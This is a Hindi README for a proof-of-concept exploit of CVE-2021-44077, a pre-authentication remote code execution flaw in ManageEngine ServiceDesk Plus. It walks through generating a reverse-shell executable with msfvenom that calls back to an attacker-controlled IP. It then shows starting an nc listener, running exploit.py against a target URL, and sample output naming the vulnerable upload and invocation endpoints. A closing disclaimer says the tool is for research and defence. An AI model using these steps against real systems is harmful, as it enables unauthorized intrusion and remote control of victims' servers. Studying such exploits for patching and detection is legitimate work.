
ManageEngine ServiceDesk Plus (CVE-2021-44077) में PreAuth RCE के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। कमजोर लक्ष्यों पर मनमाने Windows एक्जीक्यूटेबल्स को अपलोड और निष्पादित करता है।
CVE-2021-44077 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट: ManageEngine ServiceDesk Plus < 11306 में PreAuth RCE
आधारित:
CISA सलाह:
समाधान (बिल्ड 11306 या बाद में अपडेट करें):
ManageEngine ServiceDesk Plus बिल्ड 11303 पर परीक्षण किया गया। सभी एंटीवायरस अक्षम किए गए।
एक्सप्लॉइट लक्ष्य पर एक Windows निष्पादन योग्य अपलोड करता है और उसे चलाता है।
एक्सप्लॉइट करने के लिए, पहले कोई निष्पादन योग्य जनरेट करें। उदाहरण के लिए:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
pip install आवश्यकताएँ फ़ाइल या सुनिश्चित करें कि आपके पास requests पैकेज है।
यदि आप रिवर्स शेल पकड़ने का प्रयास कर रहे हैं, तो पहले अपना लिसनर चलाएँ, उदाहरण के लिए:
nc -l 4444
फिर एक्सप्लॉइट स्क्रिप्ट चलाएँ, जिसमें url और exe तर्क दें, उदाहरण के लिए:
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
स्क्रिप्ट आउटपुट का उदाहरण:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin निर्देशिका में कोई भी फ़ाइल अपलोड करने की अनुमति देती है, जिसमें बैच स्क्रिप्ट जैसी मौजूदा फ़ाइलें शामिल हैं। अपलोड की गई फ़ाइल को आमंत्रित करने के अन्य तरीके भी हो सकते हैं।यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।